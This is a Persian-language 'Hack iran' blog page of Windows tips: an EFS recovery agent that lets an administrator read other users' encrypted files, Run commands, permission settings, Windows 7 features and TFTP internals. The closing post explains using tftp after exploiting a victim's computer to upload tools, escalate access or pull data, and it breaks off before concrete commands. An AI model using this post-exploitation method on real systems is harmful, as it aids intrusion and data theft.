loading...
███▓▒░░◄ Hack iran►░░▒▓███
مرتضی(Germany) بازدید : 202 چهارشنبه 20 اردیبهشت 1391 نظرات (5)

شما به عنوان يك مدير شبكه با انجام این سناريو مي توانيد فايل ها يا فولدرهاي Encrypt شده هر كدام از كاربران يك سيستم که عمل Encryption را پس از انجام این سناریو اعمال کرده باشند را مشاهده نماييد.

ابتدا با يك User Account كه داراي دسترسي Administrator است Login كنيد سپس command prompt را باز كرده و دستور زير را در آن تايپ كرده و اينتر كنيد:

cipher /r:Eagent
سپس با عبارت زير مواجه مي شويد
Please type in the password to protect your .PFX file:
در پاسخ بايد password دلخواهي را وارد نماييد كه بعدا مورد استفاده قرار مي گيرد و سپس آنرا تاييد نماييد.
حال با مشاهده پيام زير command prompt را close نماييد:
Your .CER file was created successfully.

Your .PFX file was created successfully.

اكنون دو فايل Eagent.cer و Eagent.pfx در مسيري كه در command prompt بوده است (مثلا در تصوير فوق در آدرس C:Documents and SettingsAmiN) ذخيره شده اند.
جهت رعايت مسائل امنيتي بهتر است ايندو فايل را در يك حافظه جانبي ديگر مانند فلاپي ذخيره نماييد.

حال Certificates Managerرا با تايپ كردن certmgr.msc داخل Run باز كنيد.
از قسمت سمت چپ به Personal رفته و روي آن رايت كليك كنيد
سپس All Tasks و بعد Import را انتخاب نماييد. اكنون Certificate Import Wizard را مشاهده مي كنيد،
بر روي Next كليك كرده و در صفحه بعد روي Browse كليك كرده و پنجره Open در قسمت Files of type عبارت Personal Information Exchange (*.pfx,*.P12) را انتخاب كرده و فايل Eagent.PFX را انتخاب نماييد، Open و سپس Next را بزنيد.
حال در قسمتي كه از شما Password خواسته شده است بايد هماني را وارد كنيد كه در ابتدا براي دستور cipher انتخاب كرده ايد؛
با زدن Next به صفحه بعد رفته و عبارت Automatically select the certificate store based on the type of certificate را انتخاب كرده، Next و سپس Finish را بزنيد.
با مشاهده پيام Import was successful روي OK كليك نماييد.
اكنون Local Security Policy را با تايپ كردن secpol.mscداخل Run باز كنيد.
به داخلPublic Key Policies رفته و روي Encrypted File System رايت كليك كرده و Add Data Recovery Agent... را انتخاب كنيد.
در ويزارد باز شده روي Next و سپس Browse Folders كليك كنيد فايل Eagent.cer را انتخاب كرده و Open را بزنيد. سپس روي Next و Finish كليك كنيد.
از اين به بعد با اين User Account مي توانيد تمامي فايل ها يا فولدرهاي Encrypt شده هر كدام از كاربران يك سيستم را مشاهده نماييد.
مرتضی(Germany) بازدید : 106 چهارشنبه 20 اردیبهشت 1391 نظرات (0)

شما میتوانید با استفاده از این ترفند تمام اطلاعات ویندوز خود را تنها و با تایپ یک عبارت مشاهده کنید. این اطلاعات عبارتند ازاطلاعات مدیریتی ویندوز، حسابهای کاربری، نرم افزارهای نصب شده، سخت افزارها، سرویس ایمیل، سرویس خبری، نسخه ویندوز و بسیاری از اطلاعات دیگر که شما میتوانید حتی آن ها را در یک قالب متنی بر روی کامپیوتر ذخیره کنید.

بدین منظور:

از منوی Start وارد Run شوید.
عبارت NETSH DIAG GUI را وارد کرده و Enter بزنید.
حال چند ثانیه ای صبر کنید و در پنجره باز شده بر روی Scan your system کلیک کنید.
بررسی اطلاعات (ترفندستان) اندک زمانی طول میکشد و سپس تمامی اطلاعات برای شما نمایش داده خواهد شد.
شما می توانید با استفاده از دکمه ...Save to file در قالب یک متن html این اطلاعات را ذخیره نمایید.
برای مشاهده فایل ذخیره شده بر روی Show Saved File کلیک کنید یا مستقیمأ به پوشه WINDOWSpchealthhelpctrSystemNetDiag مراجعه کنید.

مرتضی(Germany) بازدید : 293 چهارشنبه 20 اردیبهشت 1391 نظرات (1)

سلام دوستان. یه آموزش ساده ولی بدردبخور رو میخوام بگم که واقعا مهم هست.
با استفاده از این آموزش میتونید از اینکه شخصی که آی پی شما رو میدونه به کامپیوترتون نفوذ کنه جلوگیری کنید.
روی My computer کلیک راست کنید و Properties رو انتخاب کنید. (اگه ویندوزتون 7 هست بعد از اینکار قسمت Remote Settings رو انتخاب کنید.) بعدش سربرگ Remote . اونجا بالاش یک یا جند تا چیز میبینید که تیک دارن. تیک هاشون رو بردارید. اون پایین هم Don't Allow Connections to this computer رو انتخاب کنید. بعدش Apply یا OK بزنید که تغییرات اعمال بشه.
امیدوارم مفید واقع شده باشه.

مرتضی(Germany) بازدید : 105 چهارشنبه 20 اردیبهشت 1391 نظرات (0)

113 دستور قابل اجرا در Run
از منوی Start میتوانید گزینه Run را انتخاب کنید و این دستور ها را در آن وارد کنید:
(سرچ کردم دیدم پست کاملی در این باره نبود گفتم اینو بزارم دوستان استفاده کنن)


Too Access---->Accessibility Controls



---->Run Command >----access.cpl

---------------------------------------
Add Hardware Wizard


hdwwiz.cpl

---------------------------------------
Add/Remove Programs


appwiz.cpl

----------------------------------------
Administrative Tools


control admintools

----------------------------------------
Automatic Updates


wuaucpl.cpl

----------------------------------------
Bluetooth Transfer Wizard


fsquirt

----------------------------------------
Calculator


calc

----------------------------------------
Certificate Manager


certmgr.msc

----------------------------------------
Character Map


charmap

----------------------------------------
Check Disk Utility


chkdsk

----------------------------------------
Clipboard Viewer


clipbrd

----------------------------------------
Command Prompt


cmd

----------------------------------------
Component Services


dcomcnfg

----------------------------------------
Computer Management


compmgmt.msc

----------------------------------------
Date and Time Properties


timedate.cpl

----------------------------------------
DDE Shares


ddeshare

----------------------------------------
Device Manager


devmgmt.msc

----------------------------------------
Direct X Control Panel (If Installed)*


directx.cpl

----------------------------------------
Direct X Troubleshooter


dxdiag

----------------------------------------
Disk Cleanup Utility


cleanmgr

----------------------------------------
Disk Defragment


dfrg.msc

----------------------------------------
Disk Management


diskmgmt.msc

----------------------------------------
Disk Partition Manager


diskpart

----------------------------------------
Display Properties


control desktop

----------------------------------------
Display Properties


desk.cpl

----------------------------------------
Display Properties (w/Appearance Tab Preselected)


control color

----------------------------------------
Dr. Watson System Troubleshooting Utility


drwtsn۳۲

----------------------------------------
Driver Verifier Utility


verifier

----------------------------------------
Event Viewer


eventvwr.msc

----------------------------------------
File Signature Verification Tool


sigverif

----------------------------------------
Findfast


findfast.cpl

----------------------------------------
Folders Properties


control folders

----------------------------------------
Fonts


control fonts

----------------------------------------
Fonts Folder


fonts

----------------------------------------
Free Cell Card Game


freecell

----------------------------------------
Game Controllers


joy.cpl

----------------------------------------
Group Policy Editor (XP Prof)


gpedit.msc

----------------------------------------
Hearts Card Game


mss

----------------------------------------
Iexpress Wizard


iexpress

----------------------------------------
Indexing Service


ciadv.msc

----------------------------------------
Internet Properties


inetcpl.cpl

----------------------------------------
IP Configuration (Display Connection Configuration)


ipconfig /all

----------------------------------------
IP Configuration (Display DNS Cache Contents)


ipconfig /displaydns

----------------------------------------
IP Configuration (Delete DNS Cache Contents)


ipconfig /flushdns

----------------------------------------
IP Configuration (Release All Connections)


ipconfig /release

----------------------------------------
IP Configuration (Renew All Connections)


ipconfig /renew

----------------------------------------
IP Configuration (Refreshes DHCP & Re-Registers DNS)


ipconfig /registerdns

----------------------------------------
IP Configuration (Display DHCP Class ID)


ipconfig /showclassid

----------------------------------------
IP Configuration (Modifies DHCP Class ID)


ipconfig /setclassid

----------------------------------------
Java Control Panel (If Installed)


jpicpl۳۲.cpl

----------------------------------------
Java Control Panel (If Installed)


javaws

----------------------------------------
Keyboard Properties


control keyboard

----------------------------------------
Local Security Settings


secpol.msc

----------------------------------------
Local Users and Groups


lusrmgr.msc

----------------------------------------
Logs You Out Of Windows


logoff

----------------------------------------
Microsoft Chat


winchat

----------------------------------------
Minesweeper Game


winmine

----------------------------------------
Mouse Properties


control mouse

----------------------------------------
Mouse Properties


main.cpl

----------------------------------------
Network Connections


control netconnections

----------------------------------------
Network Connections


ncpa.cpl

----------------------------------------
Network Setup Wizard


netsetup.cpl

----------------------------------------
Notepad


notepad

----------------------------------------
Nview Desktop Manager (If Installed)


nvtuicpl.cpl

----------------------------------------
Object Packager


packager

----------------------------------------
ODBC Data Source Administrator


odbccp۳۲.cpl

----------------------------------------
On Screen Keyboard


osk

----------------------------------------
Opens AC۳ ****** (If Installed)


ac۳filter.cpl

----------------------------------------
Password Properties


password.cpl

----------------------------------------
Performance Monitor


perfmon.msc

----------------------------------------
Performance Monitor


perfmon

----------------------------------------
Phone and Modem Options


telephon.cpl

----------------------------------------
Power Configuration


powercfg.cpl

----------------------------------------
Printers and Faxes


control printers

----------------------------------------
Printers Folder


printers

----------------------------------------
Private Character Editor


eudcedit

----------------------------------------
Quicktime (If Installed)


QuickTime.cpl

----------------------------------------
Regional Settings


intl.cpl

----------------------------------------
Registry Editor


regedit

----------------------------------------
Registry Editor


regedit۳۲

----------------------------------------
Remote Desktop


mstsc

----------------------------------------
Removable Storage


ntmsmgr.msc

----------------------------------------
Removable Storage Operator Requests


ntmsoprq.msc

----------------------------------------
Resultant Set of Policy (XP Prof)


rsop.msc

----------------------------------------
Scanners and Cameras


sticpl.cpl

----------------------------------------
Scheduled Tasks


control schedtasks

----------------------------------------
Security Center


wscui.cpl

----------------------------------------
Services


services.msc

----------------------------------------
Shared Folders


fsmgmt.msc

----------------------------------------
Shuts Down Windows


shutdown

----------------------------------------
Sounds and Audio


mmsys.cpl

----------------------------------------
Spider Solitare Card Game


spider

----------------------------------------
SQL Client Configuration


cliconfg

----------------------------------------
System Configuration Editor


sysedit

----------------------------------------
System Configuration Utility


msconfig

----------------------------------------
System File Checker Utility (Scan Immediately)


sfc /scannow

----------------------------------------
System File Checker Utility (Scan Once At Next Boot)


sfc /scanonce

----------------------------------------
System File Checker Utility (Scan On Every Boot)


sfc /scanboot

----------------------------------------
System File Checker Utility (Return to Default Setting)


sfc /revert

----------------------------------------
System File Checker Utility (Purge File Cache)


sfc /purgecache

----------------------------------------
System File Checker Utility (Set Cache Size to size x)


sfc /cachesize=x

----------------------------------------
System Properties


sysdm.cpl

----------------------------------------
Task Manager


taskmgr

----------------------------------------
Telnet Client


telnet

----------------------------------------
User Account Management


nusrmgr.cpl

----------------------------------------
Utility Manager


utilman

----------------------------------------
Windows Firewall


firewall.cpl

----------------------------------------
Windows Magnifier


magnify

----------------------------------------
Windows Management Infrastructure


wmimgmt.msc

----------------------------------------
Windows System Security Tool


syskey

----------------------------------------
Windows Update Launches


wupdmgr

----------------------------------------
Windows XP Tour Wizard


tourstart

----------------------------------------
Wordpad

مرتضی(Germany) بازدید : 133 چهارشنبه 20 اردیبهشت 1391 نظرات (0)

این روزها بسیاری از کاربران در تب و تاب تهیه و نصب ویندوز 7 هستند. تعریف*ها و نقدهای مختلفی که از ویندوز 7 شده باعث شده است که بسیاری از کاربران که تجربه خوبی از ویندوز ویستا نداشته*اند به این ویندوز جدید تمایل پیدا کنند. علاوه بر آن آمار کاربرانی که پس از استفاده از این ویندوز از آن اعلام رضایت کردند بالا بوده و این موضوع نوید روزهای خوشی را برای مایکروسافت به ارمغان آورده است. اما در این میان عده*ای از کاربران هستند که عقیده خاصی را دنبال می*کنند. آن*ها معتقدند که ویندوز 7، همان ویندوز ویستا است که توسط مایکروسافت کمی کاربر پسند*تر شده است. در نتیجه همچنان ویندوز XP را ترجیح می*دهند. اما شاید واقعیت چیز دیگری باشد. تفاوت*های بین ویندوز 7 و ویستا قطعاً چیزی فراتر از یک تغییرات کوچک است. در این ترفند قصد داریم به معرفی 18 قابلیت جالبی بپردازیم که در ویندوز ویستا و سایر ویندوزها از هیچ یک از آن*ها خبری نبود. قابلیت*هایی که هر یک به خودی خود یک تغییر جدی محسوب می*شود.

1. لرزاندن پنجره*ها

فرض کنید چندین پنجره مختلف را به طور همزمان در محیط ویندوز باز کرده*اید. در نسخه*های پیشین ویندوز برای اینکه این پنجره*ها را ببندید، ناچار بودید تک تک پنجره*ها Close یا Minimize کنید. اما با استفاده از این قابلیت جدید در ویندوز 7 که Aero Shake نام دارد، کافی است تا پنجره*ای که قصد دارید آن را باز نگه دارید را گرفته و با استفاده از ماوس کمی آن را بلرزانید. خواهید دید که سایر پنجره*ها Minimize خواهند شد. با انجام مجدد این کار پنجره*های کوچک شده مجدداً بازیابی خواهند شد. به این قابلیت در این ترفند به تفصیل پرداخته شده است.

2. لیست پرش

یکی از قابلیت*های فوق*العاده*ای که در ویندوز 7 اضافه شده است و باعث صرفه جویی زیادی در وقت می*شود «لیست پرش» یا Jumplist است. شما توسط برنامه*های نصب شده بر روی ویندوز فایل*های مختلفی را فراخوانی می*کنید. به عنوان مثال توسط نرم افزارهای Player، فایل*های موزیک را اجرا می*کنید. یا توسط نرم افزار Notepad فایل*های متنی را باز می*کنید. اکنون با استفاده از «لیست پرش» میتوانید به آخرین فایلهای باز شده توسط نرم افزارهای مختلف دسترسی داشته باشید بدون اینکه نیاز به اجرای اولیه برنامه مربوطه باشد. برای دسترسی به «لیست پرش» کافی است بر روی آیکن برنامه در Taskbar راست کلیک کنید تا آخرین فایلهای فراخوانده شده توسط این نرم افزار برایتان لیست شود. همچنین میتوانید در منوی Start، با کلیک بر روی فلش موجود در کنار هر برنامه به «لیست پرش» مربوط به آن برنامه دسترسی پیدا کنید.

3. توسعه پیش نمایش پنجره*ها

در ویندوز ویستا، با عبور ماوس از روی پنجره*های Minimize شده در Taskbar، پیش نمایشی از پنجره*ها در یک سایز کوچک نمایش داده می*شد. اکنون در ویندوز 7 این قابلیت توسعه داده شده است. به طوری که با قرار دادن ماوس بر روی پیش نمایش (ترفندستان) امکان بستن آن نیز وجود دارد. همچنین پنجره*های چندگانه دارای چندین پیش نمایش هستند و علاوه بر آن با استفاده از کلید ترکیبی Win+T امکان گردش میان پیش نمایش*ها وجود دارد.

4. مرتب*سازی پنجره*ها در صفحه به روشی جدید

یکی از قابلیت*های جالبی که در ویندوز 7 شاهد هستیم امکان منظم کردن و تغییر اندازه پنجره*ها در محیط ویندوز به شکلی جالب و ساده است. کافی است یک پنجره را با استفاده از ماوس بگیرید، سپس آن را به بالای صفحه مانیتور بکشید، پس از پدیدار شدن یک هاله، با رها کردن ماوس، پنجره کل صفحه را اشغال می*کند. همچنین اگر پنجره را به منتهی الیه سمت راست یا چپ مانیتور بکشید و آن را رها کنید، پنجره نیمی از صفحه را اشغال می*کند.

5. ویندوز XP در ویندوز 7

یکی از مشکلاتی که کاربران در ویندوز ویستا زیاد با آن سر و کار داشتند عدم اجرای برخی برنامه*های سازگار با ویندوز XP در محیط ویندوز ویستا بود. مایکروسافت در ویندوز 7 چاره*ای برای این مشکل پیدا کرده است. با استفاده از XP Mode شما می*توانید به طور مجازی ویندوز XP را در دل ویندوز 7 داشته باشید و با استفاده از آن هر برنامه سازگار با XP را همانند گذشته اجرا کنید. برای استفاده از XP Mode شما ابتدا بایستی نرم افزاری به نام Windows Virtual PC را دانلود و نصب کنید. سپس XP Mode را در درون آن اجرا نمایید. برای دانلود این دو می*توانید از http://www.microsoft.com/windows/vir.../download.aspx اقدام نمایید.

6. یک راه ساده و سریع برای تنظیم صفحات نمایش چندگانه

آیا تاکنون پیش آمده که کامپیوتر خود را به بیش از یک مانیتور یا پروژکتور متصل نمایید؟ در ویندوز 7 تنظیم این صفحان نمایش چندگانه در یک ثانیه امکان پذیر است! کافی است کلیدهای ترکیبی Win+P را فشار دهید و تنظیمات صفحه نمایش را اعمال نمایید.

7. رابط کاربری بهتر در خصوص دستگاه*های جانبی متصل به کامپیوتر

در ویندوز 7، پس از کلیک (ترفندستان) بر روی منوی Start بخش جدیدی به نام Devices and Printers به چشم می*خورد. در این بخش دستگاه*های متصل به کامپیوتر اعم از پرینتر و حافظه*های قابل حمل با تصویر مرتبط به هر کدام وجود دارد. با راست کلیک بر روی هر یک از دستگاه*ها امکانات منحصر به فردی نظیر آپدیت و تنظیمات قابل دسترسی است.

8. ویرایش محدوده اطلاع رسانی

در ویندوز XP و ویندوز ویستا در سمت راست محیط Taskbar محدوده*ای به نام اطلاع رسانی یا Notification Area وجود داشت. این محدوده در ویندوز 7 هم وجود دارد اما با انعطافی بسیار بیشتر که می*توان این محدوده را ویرایش و یا حتی حذف کرد. بر روی فضای خالی از این محدوده راست کلیک کنید و Customize notification icons را انتخاب نمایید. در این پنجره می*توانید نمایش یا عدم نمایش آیکن*های مربوط به هر نرم افزار را تعیین کنید. علاوه بر آن با کلیک بر روی Turn system icons on or off می*توانید نمایش یا عدم نمایش آیکن*های مربوط به خود ویندوز نظیر ساعت ویندوز را تنظیم نمایید.

9. ضبط کننده قدم به قدم مشکلات

یکی دیگر از قابلیت*های کاربردی جدید در ویندوز 7 «ضبط کننده قدم به قدم مشکلات» یا Problem Steps Recorder است. با استفاده از PSR شما می*توانید مشکلات موجود در ویندوز خود را به صورت قدم به قدم با استفاده از تصویر ذخیره نمایید و آن را جهت دریافت کمک در اختیار دیگران قرار دهید. این قابلیت در این ترفند به تفصیل بررسی شده است.

10. ذره*بین جدید

Magnifier یا ذره*بین در ویندوز XP و ویستا نیز وجود داشت، اما در ویندوز 7 با یک ذره*بین حرفه*ای طرف هستیم. برای دسترسی به ذره*بین در منوی Start عبارت Magnifier را وارد نموده و Enter بزنید. در Magnifier جدید شما می*توانید درصد بزرگ*نمایی را تعیین کنید. علاوه بر آن 3 حالت بزرگ*نمایی خواهید داشت. Full Screen که حالت تمام صفحه است و کل صفحه بزرگ خواهد شد که با حرکت ماوس کل صفحه درگیر خواهد بود. نوع دیگر حالت Lens است که یک صفحه کوچک با ماوس همراه خواهد شد که تمام بزرگ*نمایی در این صفحه رخ می*دهد و عملکردی دقیقاً مشابه یک ذره*بین خواهد داشت. آخرین حالت Docked است که یک صفحه ذره*بینی در بالا یا هر قسمت دیگری از صفحه به صورت ثابت قرار خواهد داد و تصاویر بزرگ شده در آن پدیدار خواهند شد. از Magnifier جهت کاربردهای آموزشی استفاده می*گردد.

11. یک راه جدید برای مشاهده فایل*های صوتی و تصویری

Windows Media Player در ویندوز 7 بسیار توسعه پیدا کرده است. عمده*ترین پیشرفت آن باز شدن یک پخش کننده کوچک به هنگام پخش فایل*های صوتی و تصویری است. پیشنهاد می*شود پیش از این که Player جدیدی را برای استفاده بر روی ویندوز نصب کنید، این ظاهر کاربر پسند Windows Media Player در ویندوز 7 را امتحان کنید.

12. عملیات به اشتراک گذاری در شبکه*های خانگی

در ویندوز ویستا و سایر نسخه*های ویندوز، ساخت شبکه*های خانگی و به اشتراک*گذاری منابع کاری دشوار بود. اما با استفاده از Wizard جدید موجود در ویندوز 7 به نام Homegroup شما می*توانید فولدرهایی که قصد به اشتراک*گذاری آن*ها را دارید را انتخاب کنید. سپس رمز عبوری که دریافت می*کنید را در کامپیوتر دیگر وارد نمایید تا به همین سادگی عملیات به اشتراک*گذاری صورت بگیرد. اما نکته*ای که وجود دارد این است که تنها کامپیوترهای دارای ویندوز 7 می*توانند چنین کاری را صورت دهند. جهت دسترسی به این قابلیت عبارت Homegroup را در منوی Start وارد کنید و Enter بزنید.

13. اجرای مستقیم فایل صوتی و تصویری از یک کامپیوتر دیگر

با استفاده از قابلیت جدیدی (ترفندستان) که در ویندوز 7 وجود دارد، در کامپیوترهای تحت شبکه Homegroup، نرم افزار Windows Media Player این امکان را به شما می*دهد که فایل صوتی و تصویری مستقیماً از یک کامپیوتر اجرا شده و توسط اسپیکر کامپیوتر دیگر متصل به شبکه پخش شود! به عنوان مثال اگر یک لپتاپ و یک PC را شبکه کرده*اید، از این پس می*توانید فایل*های موزیک موجود در لپتاپ را به وسیله اسپیکرهای کامپیوتر رومیزی با صدای بلند گوش کنید!

14. یک مرکز امنیتی جدید

Action Center نام محیط امنیتی جدیدی است که در ویندوز 7 گنجانده شده است. در محیط Action Center اطلاع رسانی*هایی نظیر آپدیت ویندوز، آپدیت آنتی ویروس، یادآوری پشتیبان*گیری و نظایر آن درج می*گردد. برای دسترسی به آن در منوی Start عبارت Action Center را وارد نموده و Enter بزنید.

15. سنجاق کردن برنامه*ها به Taskbar

در ویندوز 7، میتوانید جهت دسترسی سریع*تر به برنامه*ها آن*ها را در Taskbar سنجاق کنید. به طوریکه همواره در محیط Taskbar حضور داشته باشند و حتی با بستن برنامه نیز از Taskbar خارج نشوند. برای این کار کافی است بر روی آیکن برنامه در Taskbar راست کلیک کنید و Pin this program to taskbar را انتخاب کنید.

16. توسعه استفاده از قابلیت*های لمسی

این قابلیت به طور خاص مختص به صفحه نمایش*های لمسی است. در صورتی که از یک صفحه نمایش لمسی استفاده می*کنید با نصب ویندوز 7 یک تجربه شیرین از کار با دست و ویندوز 7 خواهید داشت! Taskbar بزرگ*تر و آیکن*های مربع شکل باعث راحتی کار با دست خواهند شد. علاوه بر آن اگر از Macbookها که از قابلیت Multi Touch نیز پشتیبانی می*کنند استفاده کنید همه چیز فوق العاده*تر خواهد شد! چرا که می*توانید پنجره*ها را با دو انگشت بگیرید و اندازه آن*ها را کوچک و بزرگ کنید. درست همانند آی*فون! (ترفندستان)

17. رایت فایل*های ISO

همان طور که احتمالاً می*دانید فایل*های Image مربوط به DVDها که در اصل فایل*های فشرده آماده رایت بر روی DVD*ها هستند با فرمت ISO وجود دارند. نرم افزارهایی نظیر Nero کار رایت آن*ها را بر روی DVD صورت می*دهند. اما از این پس با استفاده از ویندوز 7 نیازمند هیچ برنامه جانبی نخواهید بود. کافی است بر روی فایل ISO خود دوبار کلیک کنید تا پنجره*ای به نام Windows Disk Image Burner باز شود و از طریق آن فایل Image خود را بر روی DVD به سادگی رایت کنید.

18. سنجش رنگ صفحه نمایش

در ویندوز 7 قابلیتی به نام Display Color Calibration اضافه شده است که کار اصلی آن سنجش میزان درستی رنگ*های نمایش داده شده بر روی صفحه است. به عنوان مثال یک HDTV را به کامپیوتر خود وصل کرده*اید و قصد دارید تا به بیشترین کیفیت ممکن دست پیدا کنید. برای دسترسی به این قابلیت در منوی Start عبارت Display Color Calibration را وارد نموده و Enter بزنید.

مرتضی(Germany) بازدید : 133 سه شنبه 19 اردیبهشت 1391 نظرات (0)

ایجاد سیاستهای امنیتی
شما با ایجاد User Profile روی PC خود امنیت بیشتری را روی سیستم کامپیوتری خود ایجاد خواهید کرد. به Control Panel بروید و برروی User Option کلیک کنید و مراحل نصب را که بصورت Wizard است دنبال کنید.
اگر از Windows 95 استفاده می کنید برای رفتن به قسمت UserProfile باید Passwords Options را انتخاب کنید. پس از Restart و Login به ویندوز ، نام و کلمه عبور خود را وارد کنید که در این هنگام ویندوز به شما پیغام ایجاد Profile جدید را می دهد. حال با ساخت UserProfile قادر به استفاده از System Policy Editor جهت ایجاد محدودیت مورد نظرتان خواهید شد. قبل از استفاده از Policy Editor ، از Registry و سایر فایلهای Password دستگاه خود نسخه پشتیبان تهیه نمایید. کامپیوتر خود را Restart نمایید و در قسمت Login دکمه Cancle را انتخاب کنید. این عمل بیانگر Setting برای افراد غیر مجاز است. Policy Editor را با تایپ Poledit در قسمت Run آغاز کنید.
به File > Open Registry رفته و روی Local Users دبل کلیک کنید و در این قسمت گزینه های مورد نظر خود را برای محدود کردن دسترسی کاربران انتخاب کنید. پس از انجام کار Finish را انتخاب نمایید.
مرتضی(Germany) بازدید : 122 سه شنبه 19 اردیبهشت 1391 نظرات (0)

سلام امروز می خوام نحوه ی قفل گذاری فایلها و پوشه های شخصی را بهتان یاد بدم

1: ابتدا وارده درایوی که در آن فایل شخصیتان هست یا پوشه که که در آن فرار داده اید شوید


سپس کلید سمت راست موس را زده و وارده properties شوید و سپس وارده security شوید


بر روی advanced کلیک کرده حال یک پنجره واستون باز میشه : advanced security ..


حال بر روی change Permissions کلیک کنید


در صفحه ی جدید بر روی edit کلیک کنید در صفحه ی جدید یعنی permission entry


دو گزینه را مشاهده می کنید :


1:allow


2: Deny


2: من در اینجا یک فایل تکست را در نظر می گیرم و هدفم اینست که می خوام کسی نتونه


فایل تکست من را بخونه برای اینکار از قسمت Permissions گزینه ی


List folder / read data


را در قسمت deny تیک می زنم در این حال کسی نخواهد تونست مطلبی که در فایل تکست


من هست را بخونه


حال می خوام کاری کنم که کسی نتونه یک فولدر در صفحه ی شخصی من ایجاد کنه و همچنین


می خوام کاری کنم که کسی نتونه متنی را در فایل تکست من بنویسه و آنرا سیو کنه


برای اینکار بر روی دوگزینه ی write attributees و write extended


تیک بزنید


حال برای جلو گیری از ساخت فولدر بر روی گزینه ی روی create files و create folder


تیک بزنید


و در کل برای غیر فعال کردن پوشه ای که در آن اطلاعات شخصی هست در قسمت


full control بر روی deny کلیک کنید تا همه گزینه ها تیک شوند


برای بازگرداندن به حالت اولیه در قسمت full control در قسمت allow کلیک کنید


موفق باشید

مرتضی(Germany) بازدید : 413 سه شنبه 19 اردیبهشت 1391 نظرات (0)

با توجه به اینکه امروزه میشه با همه پسوند ها یه فایل تروجانی یا هک ساخت از mp3 و jpg و gif و .... بگیر تا هر چی که فکرشو بکنی

بنده تصمنیم گرفتم واسه اینکه خیالتون کمی راحت بشه چند سایت متخصص اینکار بهتون مهرغی کنم


این سایت ها میان فایل ها رو با برترین و قدرتمندترین آنتی یوروس های دنیا به صورت آنلاین و همیشه آپدیت تست میکنند که اگر فایل مشکوک بود بهتون میگه که کودوم انتی یوروس این فایل رو مشکوک و یا حتی ویروسی شناسایی میکنه

فایل دانلود برنامه در ادامه مطلب

مرتضی(Germany) بازدید : 252 سه شنبه 19 اردیبهشت 1391 نظرات (0)

TFTP خلاصه Trivial File Transfer Protocol است که بر روی پورت 69 کار می کند. تفاوت آن با FTP در اینست که FTP از TCP استفده می کند ولی TFTP ازUDP استفاده می کند که البته FTP دارای ثبات و اطمینان قابل قبولی هست در صورتی که TFTP سرعت را برای ما به ارمغان می آورد. نکته جالب توجه در این است که TFTP احتیاجی به پسورد ندارد. جابجایی در اینجا بدین شکل است که client از server در خواست (نوشتن)write یا (خواندن)read می کند که معمولا همان درخواست Read (PRQ) مورد قبول واقع می شود و با قبول شدن در خواست از سوی سرور ارتباط میان آن دو بر قرار می گردد و جایجایی اطلاعات آغاز می گردد. در ترانسفر packet/block جابجایی تا 512بایت آنجام شده و سپس سرور منتظر جواب دریافت(ACK) از سوی کلاینت میشود و بعد از دریافت جواب دوباره 512 بایت یعدی را می فرستد و برای هر 512بایت این کار تکرار میشود . هر یک از بلاک های دریافتی به انتهای بلاک قبلی متصل میشود اگر در این حین یکی از packet گم گردد هر دوی کلاینت و سرور یک time-out ایجاد نموده و دوباره همان packet گم شده را ارسال می کند. همیشه فرستنده باید آخرین بلاک را در حافظه نگهداری نمایید تا زمانی که پیام ACK را دریافت نماید البته اگر آخرین بلاک از فایل باشد دیگر احتیاجی به صبر کردن و نگهداری بر روی حافظه نیست. 0 mode 0 Filename 01 پیام های TFTP خواندن پیام در خواست 01 نشان دهنده 2 بایت از دستور OPcode network byte که طرف مقابل می گویید این یک READمی باشد. Filename یک رشته null terminated ascii می باشد که نام فایل را به همراه دارد. Mode یک رشته null terminated ascii می باشد که نوع جابجایی را در خود دارد. نوشتن پیام در خواست 0 mode 0 Filename 02 توضیحان این بخش هم مثل بالا می باشد با این تفاوت که 01 برای WRITE می باشد. TFTP Data Packet / Message Data 0 to 512bytes Block # 03 03 2 بایت از دستور OPcode network byte که می گوید در طرف مقبل داده ها قرار دارد. Block # 2 بایت از دستور bytes block number network byte Data 0 to 512bytes همه پکت دیتا ها 512 یایت در خود دارند غیر از آخری جواب Block # 04 04 2 بایت از دستور OPcode network byte که معلوم می کند برای طرف دیگر که ACK می باشد. Block # 2 بایت از دستور block number network byte انواع Error ها 0 errstring errcode 05 05 2 بایت از دستور OPcode network byteکه به طرف مقابل می گویید این یک Error می باشد. Errcode 2 بایت از دستور error code network byte می باشد. Errstring یک رشته null terminated ascii error و error code ها به ترتیب زیرند: 0 - Not defined. 1 - File not found. 2 - Access violation. 3 - Disk full. 4 - Illegal TFTP operation. 5 - Unknown port. 6 - File already exists. 7 - No such user و طریقه های TFTP ترانسفر دو دسته می باشند: 1. netascii که برای انتقالtext فایل ها استفاده شده که البته دو طرف باید برای دریافت و فرستادن به این روش آماده باشند 2. octet که برای انتقال فایل هایbinary مورد استفاده قرار می گیرد.
======
آموزش استفاده از Tftp .

Tftp ) (trivial file transfer Protocolپروتكلي ساده و جمع وجور براي انتقال اطلاعات از طريق شبكه است به وسيله Noel Chiappa طراحي شده است و در RFC 1350 در مورد اين پروتكل بحث شده .

TFTP تنها قابليت خواندن و نوشتن اطلاعات روي سرور راه دور را دارد. براي اين منظور يعني انتقال اطلاعات روي سرور بايد از سرور TFTP كه TFTPd نام دارد استفاده كرد يعني ابتدا روي كامپيوتري كه مي خواهيم به عنوان سرور عمل كند TFTPd را RUN كرده بعد به وسيله TFTP عمليات انتقال و دريافت اطلاعات را انجام دهيم مي توانيد از اين آدرس يك TFTPd دانلود كنيد
http://www.winagents.com/downloads/tftpsetup.exe

خوب حالا شما بايد نحوه كار اين سرور و كلاينت يعني tftp و tftpd را بياموزيد.
ما براي مثال وقتي كه يك كامپيوتر را به وسيلة اكسپلويتي هك مي كنيم يك شل از آن كامپيوتر مي گيريم خوب در اين مرحله قطعا ما تمايل داريم كه يك سري نرم افزار روي سيستم قرباني دانلود كنيم و سطح دسترسي خود را به سيستم قرباني بالا ببريم يا يك سري اطلاعات از كامپيوتر قرباني بر روي سيستم خود دانلود كنيم براي اين منظور بهترين و ساده ترين ابزار همين tftp است كه همراه سيستم عامل نيز وجود دارد و در آدرس %systemroot%/system32/ قرار دارد و شما وقتي كه يك شل گرفته ايد به راحتي مي توانيد ان را اجرا كنيد ولي بايد در ابتدا يك tftpd روي سيستم خود اجرا كرده تا سيستم شما سروري براي اين نرم افزار باشد براي اين منظور اگر همين tftpd كه در اين مقاله لينك دانلودش قرار داده شده است استفاده كنيد بايد مراحل زير را انجام دهيد:
ابتدا Tftpd32.exe را اجرا كنيد(شكل زير):
